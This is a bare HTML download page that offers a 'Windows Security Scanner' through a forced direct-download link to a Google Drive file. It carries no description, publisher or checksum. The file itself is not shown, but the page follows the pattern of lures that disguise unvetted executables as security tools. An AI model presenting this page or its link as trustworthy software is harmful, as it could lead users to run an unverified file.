<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download Scanner</title> 
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 50px;
            background-color: #f4f4f9;
        }
        h1 {
            color: #333;
        }
        .download-btn {
            padding: 15px 30px;
            font-size: 18px;
            background-color: #007bff;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            text-decoration: none;
        }
        .download-btn:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>

    <h1>Download Windows Security Scanner</h1> 
    <p>Click the button below to download the file.</p>
    
    <a href="https://drive.usercontent.google.com/download?id=1c91o1PgnmVKLIvfMIq5rFrOS7SEWLzU1&export=download&authuser=0&confirm=t&uuid=d03057cd-3f88-404e-bdbf-1ae03a496062&at=AIrpjvMWTiczMGnrZLGZRYY6lTGm%3A1736446581406" class="download-btn" download>Download File</a>

</body>
</html>